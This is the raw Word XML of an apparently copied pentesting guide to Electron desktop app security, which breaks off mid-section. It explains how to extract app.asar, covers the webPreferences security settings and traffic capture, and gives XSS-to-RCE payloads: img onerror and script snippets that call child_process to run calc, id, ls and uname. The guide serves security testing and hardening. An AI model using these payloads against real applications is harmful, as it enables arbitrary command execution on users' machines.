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57803" w14:textId="06522A6D" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE3B07">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Electron Desktop Apps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E0EC12" w14:textId="22D7C4CC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pacing w:val="-3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b/>
          <w:bCs/>
          <w:spacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CD2624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Electron combines a local backend (with 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NodeJS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) and a frontend (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Chromium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), although </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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tt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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lacks some the security mechanisms of modern browsers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073CDE04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Usually you might find the electron app code inside </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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an </w:t>
      </w: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.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asar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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application, in order to obtain the code you need to extract it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451DF600" w14:textId="3A5CDF3B" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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97340D5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npx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asar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extract </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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app.asar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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destfolder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#Extract everything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458AF542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npx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asar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extract-file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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app.asar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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main.js #Extract just a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEFC28F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In the source code of an Electron app, inside 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packet.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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, you can find specified the </w:t>
      </w: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main.js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file where security configs ad set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F07E321" w14:textId="6B519B31" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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CA15A80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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5519E7D2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 "name": "</w:t>
      </w:r>
      <w:proofErr w:type="gram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standard-notes</w:t>
      </w:r>
      <w:proofErr w:type="gram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",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDF3EED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 "main": "./app/index.js",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587DE98E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Electron has 2 process types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7175D628" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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Main Process (has complete access to NodeJS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A5BA1C" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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Renderer Process (should have NodeJS restricted access for security reasons)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E1AE80" w14:textId="218EFA33" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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03487BF" wp14:editId="449BA17C">
            <wp:extent cx="5731510" cy="40836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00E4F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A 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renderer process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will be a browser window loading a file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5061D42D" w14:textId="19EC5230" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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415A1E1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const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{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BrowserWindow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} = require('electron'</w:t>
      </w:r>
      <w:proofErr w:type="gram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);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5CF02547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let win = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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BrowserWindow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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D30E41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</w:p>
    <w:p w14:paraId="52D697F2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//Open Renderer Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9011EF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win.loadURL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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(`file://path/to/index.html`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0CAA54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Settings of the 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renderer process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can be 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configured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in the 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main process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inside the main.js file. Some of the configurations will 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prevent the Electron application to get RCE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or other vulnerabilities if the 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settings are correctly configured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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEF54AC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The electron application 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could access the device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via Node </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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apis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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although it can be </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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configure</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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to prevent it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B902392" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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spellStart"/>
      <w:r w:rsidRPr="00AE3B07">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New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nodeIntegration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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- is </w:t>
      </w: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off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by default. If on, allows to access node features from the renderer process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B1971E" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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spellStart"/>
      <w:r w:rsidRPr="00AE3B07">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New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contextIsolation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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- is </w:t>
      </w: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on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by default. If off, main and renderer processes aren't isolated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFF3623" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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preload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- empty by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCCA732" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00AE3B07">
          <w:rPr>
            <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
            <w:b/>
            <w:bCs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sandbox</w:t>
        </w:r>
      </w:hyperlink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- is off by default. It will restrict the actions NodeJS can perform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3936F1C5" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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Node Integration in Workers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE5ECC9" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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spellStart"/>
      <w:r w:rsidRPr="00AE3B07">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New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nodeIntegrationInSubframes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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- is </w:t>
      </w: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off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by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB982CF" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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lastRenderedPageBreak/>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE3B07">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New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nodeIntegration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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is 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enabled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, this would allow the use of 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Node.js APIs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in web pages that are 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loaded in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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iframes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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within an Electron application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDC03FB" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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AE3B07">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New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nodeIntegration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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is 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disabled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, then preloads will load in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7C91AAA4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Example of configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4C5C85" w14:textId="67E7A6B4" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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B865FC4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const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mainWindowOptions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= {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D14A903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 title: 'Discord',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA4A485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 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backgroundColor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: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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getBackgroundColor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),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23484049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 width: DEFAULT_WIDTH,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D6EC50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 height: DEFAULT_HEIGHT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413490F4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 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minWidth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: MIN_WIDTH,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A9BCF4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 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minHeight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: MIN_HEIGHT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C2AE16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 transparent: false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419D6CD7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 frame: false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F654EB1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 resizable: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C88CD4A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 show: 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isVisible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,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27388CCA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 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webPreferences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: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7DF36E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   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blinkFeatures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: '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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EnumerateDevices,AudioOutputDevices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF098D4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   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nodeIntegration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: false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7223DCFF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   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contextIsolation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: false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E216A0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   sandbox: false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508AD8DB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   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nodeIntegrationInSubFrames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: false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AE3680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   preload: _</w:t>
      </w:r>
      <w:proofErr w:type="gram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path2.default.join</w:t>
      </w:r>
      <w:proofErr w:type="gram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(__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dirname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, 'mainScreenPreload.js'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6DD0C0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   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nativeWindowOpen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: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEE2028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   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enableRemoteModule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: false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0054602C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   spellcheck: </w:t>
      </w:r>
      <w:proofErr w:type="gram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true</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3FFA2FF5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 }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0E97C7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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E1AA59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Some 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RCE payloads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from </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00AE3B0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here</w:t>
        </w:r>
      </w:hyperlink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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A50F851" w14:textId="56A2025B" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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F53090C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Example Payloads (Windows):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8F1875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&lt;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img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src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=x onerror="alert(require('child_process'</w:t>
      </w:r>
      <w:proofErr w:type="gram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).execSync</w:t>
      </w:r>
      <w:proofErr w:type="gram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('calc').toString());"&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAA072A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</w:p>
    <w:p w14:paraId="58E194BF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Example Payloads (Linux &amp; MacOS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61144FF5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&lt;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img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src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=x onerror="alert(require('child_process'</w:t>
      </w:r>
      <w:proofErr w:type="gram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).execSync</w:t>
      </w:r>
      <w:proofErr w:type="gram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('gnome-calculator').toString());"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634C4B69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&lt;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img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src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=x onerror="alert(require('child_process'</w:t>
      </w:r>
      <w:proofErr w:type="gram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).execSync</w:t>
      </w:r>
      <w:proofErr w:type="gram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('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());"&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F5DA15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&lt;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img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src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=x onerror="alert(require('child_process'</w:t>
      </w:r>
      <w:proofErr w:type="gram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).execSync</w:t>
      </w:r>
      <w:proofErr w:type="gram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('id').toString());"&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BC106C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&lt;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img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src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=x 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onerror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="alert(require('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child_process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'</w:t>
      </w:r>
      <w:proofErr w:type="gram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).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execSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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('ls -l').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toString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());"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CEF34D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&lt;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img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src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=x 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onerror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="alert(require('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child_process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'</w:t>
      </w:r>
      <w:proofErr w:type="gram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).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execSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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('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uname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-a').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toString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());"&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25589DED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b/>
          <w:bCs/>
          <w:spacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Capture traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AF557A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Modify the start-main configuration and add the use of a proxy such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086F14FF" w14:textId="00290FA3" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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8852ECA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"</w:t>
      </w:r>
      <w:proofErr w:type="gram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start</w:t>
      </w:r>
      <w:proofErr w:type="gram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-main": "electron ./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dist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/main/main.js --proxy-server=127.0.0.1:8080 --ignore-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certificateerrors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",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1860BF0C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pacing w:val="-3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b/>
          <w:bCs/>
          <w:spacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Electron Local Code Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528DE3A9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If you can execute locally an Electron App it's possible that you could make it execute arbitrary </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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code. Check how in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28639BFE" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B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0" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00AE3B07">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:caps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PAGE</w:t>
        </w:r>
        <w:r w:rsidRPr="00AE3B0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macOS</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00AE3B0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 xml:space="preserve"> Electron Applications Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="106431B3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pacing w:val="-3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b/>
          <w:bCs/>
          <w:spacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">RCE: XSS + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE3B07">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>nodeIntegration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6ED34C02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If the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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nodeIntegration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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is set to 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on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, a web page's JavaScript can use Node.js features easily just by calling the </w:t>
      </w:r>
      <w:proofErr w:type="gram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require(</w:t>
      </w:r>
      <w:proofErr w:type="gram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)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 For example, the way to execute the calc application on Windows is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B17DA78" w14:textId="1B88A0EB" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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D24FD3F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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F141096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 require('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child_process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'</w:t>
      </w:r>
      <w:proofErr w:type="gram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).exec</w:t>
      </w:r>
      <w:proofErr w:type="gram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('calc');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCD14E6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 // or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A77D31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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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top.require</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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('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child_process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').exec('open /System/Applications/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Calculator.app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');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597A9F22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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5037CF7D" w14:textId="25159F54" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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A486B0D" wp14:editId="30256161">
            <wp:extent cx="5731510" cy="27813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FDD15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pacing w:val="-3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b/>
          <w:bCs/>
          <w:spacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>RCE: preload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49712CF8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The script indicated in this setting is l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oaded before other scripts in the renderer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, so it has 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unlimited access to Node APIs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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D704BB" w14:textId="74919A2F" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DD3D37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new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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BrowserWindow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{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="66826B87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 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webPreferences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: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34640052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   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nodeIntegration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: false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6D214D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   preload: _</w:t>
      </w:r>
      <w:proofErr w:type="gram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path2.default.join</w:t>
      </w:r>
      <w:proofErr w:type="gram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(__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dirname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, 'perload.js'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A38D2C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 }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316B90C0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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069CDF55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Therefore, the script can export node-features to pages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B308197" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="6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spacing w:val="6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>preload.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE86329" w14:textId="527BE734" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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430E58C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typeof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require === 'function</w:t>
      </w:r>
      <w:proofErr w:type="gram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';</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="72E31AE6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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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window.runCalc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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= function(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8BF11A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   require('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child_process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'</w:t>
      </w:r>
      <w:proofErr w:type="gram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).exec</w:t>
      </w:r>
      <w:proofErr w:type="gram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('calc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAD3C8D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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF8B95A" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="6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spacing w:val="6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEB7A26" w14:textId="16D3F61E" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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0B9F672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&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093049CF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   &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8C4E3D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       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typeof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require === 'undefined</w:t>
      </w:r>
      <w:proofErr w:type="gram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';</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4DA22AF0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       </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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runCalc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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61561C8A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   &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F91D4CA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&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589D307C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If </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE3B07">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New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contextIsolation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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is on, this won't </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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work</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2159DC7E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pacing w:val="-3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b/>
          <w:bCs/>
          <w:spacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">RCE: XSS + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE3B07">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>contextIsolation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0F6C8047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AE3B07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contextIsolation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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introduces the 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separated contexts between the web page scripts and the JavaScript Electron's internal code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so that the JavaScript execution of each code does not affect each. This is a necessary feature to eliminate the possibility of RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5081E79A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If the contexts aren't isolated an attacker can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229EE78C" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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Execute 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arbitrary JavaScript in renderer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(XSS or navigation to external sites)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4525AF37" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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Overwrite the built-in method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which is used in preload or Electron internal code to own </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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function</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="51BFA426" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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Trigger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the use of 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overwritten </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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function</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="40093779" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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RCE?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA1E57D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There are 2 places where built-int methods can be overwritten: In preload code or in Electron internal code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EDBFA8" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B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2" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00AE3B07">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:caps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PAGE</w:t>
        </w:r>
        <w:r w:rsidRPr="00AE3B0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Electron</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00AE3B0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 xml:space="preserve"> </w:t>
        </w:r>
